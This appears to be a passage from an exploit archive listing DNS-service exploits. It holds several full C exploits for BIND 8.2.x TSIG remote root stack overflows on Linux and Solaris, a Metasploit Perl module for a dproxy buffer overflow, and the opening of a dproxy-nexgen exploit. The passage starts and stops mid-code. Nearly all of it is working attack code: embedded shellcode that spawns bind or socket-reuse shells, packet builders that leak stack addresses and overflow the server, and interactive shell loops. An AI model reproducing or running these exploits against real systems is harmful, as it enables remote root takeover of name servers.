adr.sin_port=htons(53);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if((hp=gethostbyname(argv[1]))==NULL) {
errno=EADDRNOTAVAIL;goto err;
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck[0]=socket(AF_INET,SOCK_DGRAM,0);
sck[1]=socket(AF_INET,SOCK_STREAM,0);
if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
i=sizeof(struct sockaddr_in);
if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck[1],(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck[1],(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
asmcode[4+48+2]=(unsigned char)((n>>8)&0xff);
asmcode[4+48+3]=(unsigned char)(n&0xff);
if(write(sck[0],msg,sizeof(msg))==-1) goto err;
if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
printf("stack dump:\n");
for(i=0;i<(cnt-512);i++){
printf("%s%02x ",(i&&(!(i%16)))?"\n":"",(unsigned char)buffer[512+i]);
}
printf("\n\n");
fp=rev(*(unsigned int*)&buffer[532]);
ofs=0xfe-((fp-(fp&0xffffff00))&0xff);
cnt=163;
if((buffer[512+20+2]!=(char)0xff)&&(buffer[512+20+3]!=(char)0xbf)){
printf("system does not seem to be a vulnerable linux\n");exit(1);
}
if(flag==1){
printf("system seems to be running bind 8.2.x on a linux\n");exit(-1);
}
if(cnt<(ofs+28)){
printf("frame ptr is too low to be successfully exploited\n");exit(-1);
}
jmp=rev(fp-586);
ptr6=rev((fp&0xffffff00)-12);
fp=rev(fp&0xffffff00);
printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);
b=buffer;
memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12;
for(i=0;i<strlen(asmcode);i++) *b++=asmcode[i];
for(i=0;i<(128>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5;
for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;
*b++=28;
memcpy(b,"\x06\x00\x00\x00",4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,"\x06\x00\x00\x00",4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,&ptr6,4);b+=4;
cnt-=ofs+28;
for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9;
if(write(sck[0],buffer,b-buffer)==-1) goto err;
sleep(1);printf("sent!\n");
write(sck[1],"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck[1],&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck[1],buf,cnt);
}
if(FD_ISSET(sck[1],&fds)){
if((cnt=read(sck[1],buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
exit(0);
err:
perror("error");exit(-1);
}
// [2001-03-01]
53 BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (3)
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## bind 8.2 8.2.1 8.2.2 8.2.2-PX Solaris 2.7 x86 #*/
/* The code establishes a TCP connection with port 53 of a target system. */
/* It makes use of the "infoleek" bug (through UDP) to obtain the base */
/* value of the named process frame stack pointer, which is later used */
/* for constructing proper DNS tsig exploit packet. */
/* */
/* Upon successful exploitation the assembly routine gets executed. It */
/* walks the descriptor table of the exploited named process in a search */
/* for the socket descriptor of the previously established TCP connection. */
/* Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh */
/* is spawned. */
/* */
/* The use of such an assembly routine allows successfull exploitation of */
/* the vulnerability in the case when vulnerable dns servers are protected */
/* by tightly configured firewall systems (with only 53 tcp/udp port open). */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
char msg[]={
0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x01,0x20,0x20,0x20,0x20,0x02,0x61
};
char asmcode[]=
"\x1b" /* label len 1+26 */
"\x90" /* padding */
"\x33\xc0" /* xorl %eax,%eax */
"\xeb\x09" /* jmp <syscallcode+13> */
"\x5f" /* popl %edi */
"\x57" /* pushl %edi */
"\x47" /* incl %edi */
"\xab" /* stosl %eax,%es:(%edi) */
"\x47" /* incl %edi */
"\xaa" /* stosb %al,%es:(%edi) */
"\x5e" /* popl %esi */
"\xeb\x0e" /* jmp <syscallcode+26+1> */
"\xe8\xf2\xff\xff\xff" /* call <syscallcode+4> */
"\x9a\xff\xff\xff\xff"
"\x07\xff"
"\xc3" /* ret */
"\x33" /* label len 51 */
"\x56" /* pushl %esi */
"\x5f" /* popl %edi */
"\x83\xef\x7c" /* subl $0x7c,%edi */
"\x57" /* pushl %edi */
"\x8d\x4f\x10" /* leal 0x10(%edi),%ecx */
"\xb0\x44" /* movb $0x44,%al */
"\xab" /* stosl %eax,%es:(%edi) */
"\xab" /* stosl %eax,%es:(%edi) */
"\x91" /* xchgl %ecx,%eax */
"\xab" /* stosl %eax,%es:(%edi) */
"\x95" /* xchgl %eax,%ebp */
"\x66\xb9\x91\x54" /* movw $0x5491,%cx */
"\x51" /* pushl %ecx */
"\x66\xb9\x01\x01" /* movw $0x0101,%cx */
"\x51" /* pushl %ecx */
"\x33\xc0" /* xorl %eax,%eax */
"\xb0\x36" /* movb $0x36,%al */
"\xff\xd6" /* call *%esi */
"\x59" /* popl %ecx */
"\x33\xdb" /* xorl %ebx,%ebx */
"\x3b\xc3" /* cmpl %ebx,%eax */
"\x75\x0a" /* jne <findsckcode+49> */
"\x66\xbb\x12\x34" /* movw $0x1234,%bx */
"\x66\x39\x5d\x02" /* cmpw %bx,0x2(%ebp) */
"\x74\x03" /* je <findsckcode+51+1> */
"\xe2\xe6" /* loop <findsckcode+25> */
"\x37" /* label len 21+34 */
"\xb0\x09" /* movb $0x09,%al */
"\x50" /* pushl %eax */
"\x51" /* pushl %ecx */
"\x91" /* xchgl %ecx,%eax */
"\xb1\x03" /* movb $0x03,%cl */
"\x49" /* decl %ecx */
"\x89\x4c\x24\x08" /* movl %ecx,0x8(%esp) */
"\x41" /* incl %ecx */
"\x33\xc0" /* xorl %eax,%eax */
"\xb0\x3e" /* movb $0x3e,%al */
"\xff\xd6" /* call *%esi */
"\xe2\xf2" /* loop <findsckcode+58+1> */
"\xeb\x13" /* jmp <shellcode+21> */
"\x33\xd2" /* xorl %edx,%edx */
"\x58" /* popl %eax */
"\x8d\x78\x14" /* leal 0x14(%eax),edi */
"\x52" /* pushl %edx */
"\x57" /* pushl %edi */
"\x50" /* pushl %eax */
"\xab" /* stosl %eax,%es:(%edi) */
"\x92" /* xchgl %eax,%edx */
"\xab" /* stosl %eax,%es:(%edi) */
"\x88\x42\x08" /* movb %al,0x8(%edx) */
"\xb0\x3b" /* movb $0x3b,%al */
"\xff\xd6" /* call *%esi */
"\xe8\xe8\xff\xff\xff" /* call <shellcode+2> */
"/bin/ksh"
;
int rev(int a){
int i=1;
if((*(char*)&i)) return(a);
return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}
int main(int argc,char **argv){
char buffer[1024],*b;
int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/\n");
printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for solaris 2.7 x86\n\n");
if(argc<2){
printf("usage: %s address [-s][-e]\n",argv[0]);
printf(" -s send infoleek packet\n");
printf(" -e send exploit packet\n");
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"se"))!=-1){
switch(c){
case 's': flag=1;break;
case 'e': flag=2;
}
}
if(flag==-1) exit(-1);
adr.sin_family=AF_INET;
adr.sin_port=htons(53);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if((hp=gethostbyname(argv[1]))==NULL) {
errno=EADDRNOTAVAIL;goto err;
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck[0]=socket(AF_INET,SOCK_DGRAM,0);
sck[1]=socket(AF_INET,SOCK_STREAM,0);
if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
i=sizeof(struct sockaddr_in);
if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck[1],(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck[1],(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
asmcode[1+1+26+1+39+2]=(unsigned char)((n>>8)&0xff);
asmcode[1+1+26+1+39+3]=(unsigned char)(n&0xff);
if(write(sck[0],msg,sizeof(msg))==-1) goto err;
if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
printf("stack dump:\n");
for(i=0;i<(cnt-512);i++){
printf("%s%02x ",(i&&(!(i%16)))?"\n":"",(unsigned char)buffer[512+i]);
}
printf("\n\n");
fp=rev(*(unsigned int*)&buffer[532]);
ofs=0x0106-((fp-(fp&0xffffff00))&0xff);
cnt=163;
if((buffer[512+20+2]!=(char)0x04)&&(buffer[512+20+3]!=(char)0x08)){
printf("system does not seem to be a vulnerable solaris\n");exit(1);
}
if(flag==1){
printf("system seems to be running bind 8.2.x on a solaris\n");exit(-1);
}
if(cnt<(ofs+12)){
printf("frame ptr is too low to be successfully exploited\n");exit(-1);
}
jmp=rev(fp-583);
ptr6=rev((fp&0xffffff00)+8);
fp=rev(fp&0xffffff00);
printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);
b=buffer;
memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12;
for(i=0;i<strlen(asmcode);i++) *b++=asmcode[i];
for(i=0;i<(120>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5;
for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;
*b++=12;
memcpy(b,&jmp,4);b+=4;
memcpy(b,"\x06\x00\x00\x00",4);b+=4;
memcpy(b,&ptr6,4);b+=4;
cnt-=ofs+12;
for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9;
if(write(sck[0],buffer,b-buffer)==-1) goto err;
sleep(1);printf("sent!\n");
write(sck[1],"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck[1],&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck[1],buf,cnt);
}
if(FD_ISSET(sck[1],&fds)){
if((cnt=read(sck[1],buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
exit(0);
err:
perror("error");exit(-1);
}
// [2001-03-01]
53 BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (4)
/*
* This exploit has been fixed and extensive explanation and clarification
* added.
* Cleanup done by:
* Ian Goldberg <[email protected]>
* Jonathan Wilkins <[email protected]>
* NOTE: the default installation of RedHat 6.2 seems to not be affected
* due to the compiler options. If BIND is built from source then the
* bug is able to manifest itself.
*/
/*
* Original Comment:
* lame named 8.2.x remote exploit by
*
* Ix [[email protected]] (the master of jmpz),
* lucysoft [[email protected]] (the master of queries)
*
* this exploits the named INFOLEAK and TSIG bug (see http://www.isc.org/products/BIND/bind-security.html)
* linux only shellcode
* this is only for demo purposes, we are not responsable in any way for what you do with this code.
*
* flamez - canaris
* greetz - blizzard, netman.
* creditz - anathema <[email protected]> for the original shellcode
* - additional code ripped from statdx exploit by ron1n
*
* woo, almost forgot... this exploit is pretty much broken (+4 errors), but we hope you got the idea.
* if you understand how it works, it won't be too hard to un-broke it
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#define max(a,b) ((a)>(b)?(a):(b))
#define BUFFSIZE 4096
int argevdisp1, argevdisp2;
char shellcode[] =
/* The numbers at the right indicate the number of bytes the call takes
* and the number of bytes used so far. This needs to be lower than
* 62 in order to fit in a single Query Record. 2 are used in total to
* send the shell code
*/
/* main: */
/* "callz" is more than 127 bytes away, so we jump to an intermediate
spot first */
"\xeb\x44" /* jmp intr */ // 2 - 2
/* start: */
"\x5e" /* popl %esi */ // 1 - 3
/* socket() */
"\x29\xc0" /* subl %eax, %eax */ // 2 - 5
"\x89\x46\x10" /* movl %eax, 0x10(%esi) */ // 3 - 8
"\x40" /* incl %eax */ // 1 - 9
"\x89\xc3" /* movl %eax, %ebx */ // 2 - 11
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ // 3 - 14
"\x40" /* incl %eax */ // 1 - 15
"\x89\x46\x08" /* movl %eax, 0x08(%esi) */ // 3 - 18
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 21
"\xb0\x66" /* movb $0x66, %al */ // 2 - 23
"\xcd\x80" /* int $0x80 */ // 2 - 25
/* bind() */
"\x43" /* incl %ebx */ // 1 - 26
"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ // 4 - 30
"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ // 4 - 34
"\x88\x46\x08" /* movb %al, 0x08(%esi) */ // 3 - 37
"\x29\xc0" /* subl %eax, %eax */ // 2 - 39
"\x89\xc2" /* movl %eax, %edx */ // 2 - 41
"\x89\x46\x18" /* movl %eax, 0x18(%esi) */ // 3 - 44
/*
* the port address in hex (0x9000 = 36864), if this is changed, then a similar
* change must be made in the connection() call
* NOTE: you only get to set the high byte
*/
"\xb0\x90" /* movb $0x90, %al */ // 2 - 46
"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ // 4 - 50
"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ // 3 - 53
"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ // 3 - 56
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 59
"\xeb\x02" /* jmp cont */ // 2 - 2
/* intr: */
"\xeb\x43" /* jmp callz */ // 2 - 4
/* cont: */
"\xb0\x66" /* movb $0x66, %al */ // 2 - 6
"\xcd\x80" /* int $0x80 */ // 2 - 10
/* listen() */
"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ // 3 - 11
"\x43" /* incl %ebx */ // 1 - 12
"\x43" /* incl %ebx */ // 1 - 13
"\xb0\x66" /* movb $0x66, %al */ // 2 - 15
"\xcd\x80" /* int $0x80 */ // 2 - 17
/* accept() */
"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ // 3 - 20
"\x89\x56\x10" /* movl %edx, 0x10(%esi) */ // 3 - 23
"\xb0\x66" /* movb $0x66, %al */ // 2 - 25
"\x43" /* incl %ebx */ // 1 - 26
"\xcd\x80" /* int $0x80 */ // 1 - 27
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"\x86\xc3" /* xchgb %al, %bl */ // 2 - 29
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 31
"\x29\xc9" /* subl %ecx, %ecx */ // 2 - 33
"\xcd\x80" /* int $0x80 */ // 2 - 35
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 37
"\x41" /* incl %ecx */ // 1 - 38
"\xcd\x80" /* int $0x80 */ // 2 - 40
"\xb0\x3f" /* movb $0x3f, %al */ // 2 - 42
"\x41" /* incl %ecx */ // 1 - 43
"\xcd\x80" /* int $0x80 */ // 2 - 45
/* execve() */
"\x88\x56\x07" /* movb %dl, 0x07(%esi) */ // 3 - 48
"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ // 3 - 51
"\x87\xf3" /* xchgl %esi, %ebx */ // 2 - 53
"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ // 3 - 56
"\xb0\x0b" /* movb $0x0b, %al */ // 2 - 58
"\xcd\x80" /* int $0x80 */ // 2 - 60
"\x90"
/* callz: */
"\xe8\x72\xff\xff\xff" /* call start */ // 5 - 5
"/bin/sh"; /* There's a NUL at the end here */ // 8 - 13
unsigned long resolve_host(char* host)
{
long res;
struct hostent* he;
if (0 > (res = inet_addr(host)))
{
if (!(he = gethostbyname(host)))
return(0);
res = *(unsigned long*)he->h_addr;
}
return(res);
}
int dumpbuf(char *buff, int len)
{
char line[17];
int x;
/* print out a pretty hex dump */
for(x=0;x<len;x++){
if(!(x%16) && x){
line[16] = 0;
printf("\t%s\n", line);
}
printf("%02X ", (unsigned char)buff[x]);
if(isprint((unsigned char)buff[x]))
line[x%16]=buff[x];
else
line[x%16]='.';
}
printf("\n");
}
void
runshell(int sockd)
{
char buff[1024];
int fmax, ret;
fd_set fds;
fmax = max(fileno(stdin), sockd) + 1;
send(sockd, "uname -a; id;\n", 15, 0);
for(;;)
{
FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sockd, &fds);
if(select(fmax, &fds, NULL, NULL, NULL) < 0)
{
exit(EXIT_FAILURE);
}
if(FD_ISSET(sockd, &fds))
{
bzero(buff, sizeof buff);
if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
{
exit(EXIT_FAILURE);
}
if(!ret)
{
fprintf(stderr, "Connection closed\n");
exit(EXIT_FAILURE);
}
write(fileno(stdout), buff, ret);
}
if(FD_ISSET(fileno(stdin), &fds))
{
bzero(buff, sizeof buff);
ret = read(fileno(stdin), buff, sizeof buff);
if(send(sockd, buff, ret, 0) != ret)
{
fprintf(stderr, "Transmission loss\n");
exit(EXIT_FAILURE);
}
}
}
}
connection(struct sockaddr_in host)
{
int sockd;
host.sin_port = htons(36864);
printf(" connecting..\n");
usleep(2000);
if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
exit(EXIT_FAILURE);
}
if(connect(sockd, (struct sockaddr *) &host, sizeof host) != -1)
{
printf(" wait for your shell..\n");
usleep(500);
runshell(sockd);
}
else
{
printf("[x] error: named not vulnerable or wrong offsets used\n");
}
close(sockd);
}
int infoleak_qry(char* buff)
{
HEADER* hdr;
int n, k;
char* ptr;
int qry_space = 12;
int dummy_names = 7;
int evil_size = 0xff;
memset(buff, 0, BUFFSIZE);
hdr = (HEADER*)buff;
hdr->id = htons(0xbeef);
hdr->opcode = IQUERY;
hdr->rd = 1;
hdr->ra = 1;
hdr->qdcount = htons(0);
hdr->nscount = htons(0);
hdr->ancount = htons(1);
hdr->arcount = htons(0);
ptr = buff + sizeof(HEADER);
printf("[d] HEADER is %d long\n", sizeof(HEADER));
n = 62;
for(k=0; k < dummy_names; k++)
{
*ptr++ = n;
ptr += n;
}
ptr += 1;
PUTSHORT(1/*ns_t_a*/, ptr); /* type */
PUTSHORT(T_A, ptr); /* class */
PUTLONG(1, ptr); /* ttl */
PUTSHORT(evil_size, ptr); /* our *evil* size */
return(ptr - buff + qry_space);
}
int evil_query(char* buff, int offset)
{
int lameaddr, shelladdr, rroffsetidx, rrshellidx, deplshellcode, offset0;
HEADER* hdr;
char *ptr;
int k, bufflen;
u_int n, m;
u_short s;
int i;
int shelloff, shellstarted, shelldone;
int towrite, ourpack;
int n_dummy_rrs = 7;
printf("[d] evil_query(buff, %08x)\n", offset);
printf("[d] shellcode is %d long\n", sizeof(shellcode));
shelladdr = offset - 0x200;
lameaddr = shelladdr + 0x300;
ourpack = offset - 0x250 + 2;
towrite = (offset & ~0xff) - ourpack - 6;
printf("[d] olb = %d\n", (unsigned char) (offset & 0xff));
rroffsetidx = towrite / 70;
offset0 = towrite - rroffsetidx * 70;
if ((offset0 > 52) || (rroffsetidx > 6))
{
printf("[x] could not write our data in buffer (offset0=%d, rroffsetidx=%d)\n", offset0, rroffsetidx);
return(-1);
}
rrshellidx = 1;
deplshellcode = 2;
hdr = (HEADER*)buff;
memset(buff, 0, BUFFSIZE);
/* complete the header */
hdr->id = htons(0xdead);
hdr->opcode = QUERY;
hdr->rd = 1;
hdr->ra = 1;
hdr->qdcount = htons(n_dummy_rrs);
hdr->ancount = htons(0);
hdr->arcount = htons(1);
ptr = buff + sizeof(HEADER);
shellstarted = 0;
shelldone = 0;
shelloff = 0;
n = 63;
for (k = 0; k < n_dummy_rrs; k++)
{
*ptr++ = (char)n;
for(i = 0; i < n-2; i++)
{
if((k == rrshellidx) && (i == deplshellcode) && !shellstarted)
{
printf(" injecting shellcode at %d\n", k);
shellstarted = 1;
}
if ((k == rroffsetidx) && (i == offset0))
{
*ptr++ = lameaddr & 0x000000ff;
*ptr++ = (lameaddr & 0x0000ff00) >> 8;
*ptr++ = (lameaddr & 0x00ff0000) >> 16;
*ptr++ = (lameaddr & 0xff000000) >> 24;
*ptr++ = shelladdr & 0x000000ff;
*ptr++ = (shelladdr & 0x0000ff00) >> 8;
*ptr++ = (shelladdr & 0x00ff0000) >> 16;
*ptr++ = (shelladdr & 0xff000000) >> 24;
*ptr++ = argevdisp1 & 0x000000ff;
*ptr++ = (argevdisp1 & 0x0000ff00) >> 8;
*ptr++ = (argevdisp1 & 0x00ff0000) >> 16;
*ptr++ = (argevdisp1 & 0xff000000) >> 24;
*ptr++ = argevdisp2 & 0x000000ff;
*ptr++ = (argevdisp2 & 0x0000ff00) >> 8;
*ptr++ = (argevdisp2 & 0x00ff0000) >> 16;
*ptr++ = (argevdisp2 & 0xff000000) >> 24;
i += 15;
}
else
{
if (shellstarted && !shelldone)
{
*ptr++ = shellcode[shelloff++];
if(shelloff == (sizeof(shellcode)))
shelldone=1;
}
else
{
*ptr++ = i;
}
}
}
/* OK: this next set of bytes constitutes the end of the
* NAME field, the QTYPE field, and the QCLASS field.
* We have to have the shellcode skip over these bytes,
* as well as the leading 0x3f (63) byte for the next
* NAME field. We do that by putting a jmp instruction
* here.
*/
*ptr++ = 0xeb;
if (k == 0)
{
*ptr++ = 10;
/* For alignment reasons, we need to stick an extra
* NAME segment in here, of length 3 (2 + header).
*/
m = 2;
*ptr++ = (char)m; // header
ptr += 2;
}
else
{
*ptr++ = 0x07;
}
/* End the NAME with a compressed pointer. Note that it's
* not clear that the value used, C0 00, is legal (it
* points to the beginning of the packet), but BIND apparently
* treats such things as name terminators, anyway.
*/
*ptr++ = 0xc0; /*NS_CMPRSFLGS*/
*ptr++ = 0x00; /*NS_CMPRSFLGS*/
ptr += 4; /* QTYPE, QCLASS */
}
/* Now we make the TSIG AR */
*ptr++ = 0x00; /* Empty name */
PUTSHORT(0xfa, ptr); /* Type TSIG */
PUTSHORT(0xff, ptr); /* Class ANY */
bufflen = ptr - buff;
// dumpbuf(buff, bufflen);
return(bufflen);
}
long xtract_offset(char* buff, int len)
{
long ret;
/* Here be dragons. */
/* (But seriously, the values here depend on compilation options
* used for BIND.
*/
ret = *((long*)&buff[0x214]);
argevdisp1 = 0x080d7cd0;
argevdisp2 = *((long*)&buff[0x264]);
printf("[d] argevdisp1 = %08x, argevdisp2 = %08x\n",
argevdisp1, argevdisp2);
// dumpbuf(buff, len);
return(ret);
}
int main(int argc, char* argv[])
{
struct sockaddr_in sa;
int sock;
long address;
char buff[BUFFSIZE];
int len, i;
long offset;
socklen_t reclen;
unsigned char foo[4];
printf(" named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix\n");
printf(" fixed by [email protected] and [email protected]\n\n");
address = 0;
if (argc < 2)
{
printf(" usage : %s host\n", argv[0]);
return(-1);
}
if (!(address = resolve_host(argv[1])))
{
printf("[x] unable to resolve %s, try using an IP address\n", argv[1]);
return(-1);
} else {
memcpy(foo, &address, 4);
printf(" attacking %s (%d.%d.%d.%d)\n", argv[1], foo[0], foo[1], foo[2], foo[3]);
}
sa.sin_family = AF_INET;
if (0 > (sock = socket(sa.sin_family, SOCK_DGRAM, 0)))
{
return(-1);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(53);
sa.sin_addr.s_addr= address;
len = infoleak_qry(buff);
printf("[d] infoleak_qry was %d long\n", len);
len = sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
if (len < 0)
{
printf(" unable to send iquery\n");
return(-1);
}
reclen = sizeof(sa);
len = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&sa, &reclen);
if (len < 0)
{
printf("[x] unable to receive iquery answer\n");
return(-1);
}
printf(" iquery resp len = %d\n", len);
offset = xtract_offset(buff, len);
printf(" retrieved stack offset = %x\n", offset);
len = evil_query(buff, offset);
if(len < 0){
printf("[x] error sending tsig packet\n");
return(0);
}
sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
if (0 > close(sock))
{
return(-1);
}
connection(sa);
return(0);
}
// [2001-03-02]
53 dproxy <= 0.5 Remote Buffer Overflow Exploit (meta 2.7)
# MetaSploit exploit for remote buffer overflow issue in dproxy
# Written in 2007 by Alexander Klink
# (c) 2007 Cynops GmbH
# released under the same license as MSF (Artistic, GPL dual-licensed)
# $Revision: 1.1 $
package Msf::Exploit::dproxy;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Udp;
use Pex::Text;
my $advanced = { };
my $info = {
'Name' => 'dproxy v0.1 - v0.5 buffer overflow exploit',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'Alexander Klink, Cynops GmbH', ],
'Arch' => [ 'x86' ],
'OS' => [ 'linux'],
'Priv' => 0,
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
},
'Payload' => {
'Space' => 500,
'BadChars' => "\x00",
},
'Description' => Pex::Text::Freeform(qq{
This exploits a buffer overflow in dproxy version 0.1 to 0.5.
}),
'Refs' => [
[ 'CVE', '2007-1465' ],
],
'DefaultTarget' => 0,
'Targets' => [
['Linux', 0xbfffe480],
],
'Keys' => [ 'dproxy' ],
'DisclosureDate' => 'Mar 20 2007',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced
}, @_
);
return $self;
}
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = 53;
my $targetIndex = $self->GetVar('TARGET');
my $srcPort = $self->GetVar('CPORT');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
if (! $self->InitNops(512)) {
$self->PrintLine("Could not initialize the nop module");
return;
}
my $sock = Msf::Socket::Udp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
'LocalPort' => $srcPort,
);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
$self->PrintLine('Trying ' . $target->[0] . ' (' . $targetHost . ')');
my $evil = 'A' x 1000 . $self->MakeNops(500) . $shellcode
. 'A' x (2073 - 1500 - length($shellcode)) . pack('V', $target->[1]);
$sock->Send($evil);
return;
}
1;
# [2007-03-23]
53 dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)
/* dproxy-v1.c
*
* Copyright (c) 2007 by <[email protected]>
*
* dproxy-nexgen remote root exploit (x86-lnx)
* by mu-b - Mar 2007
*
* - Tested on: dproxy-nexgen (.tar.gz)
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#define BUF_SIZE 512
#define NOP 0x41
#define DEF_PORT 53
#define PORT_DNS DEF_PORT
#define PORT_SHELL 4444
const u_char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1"
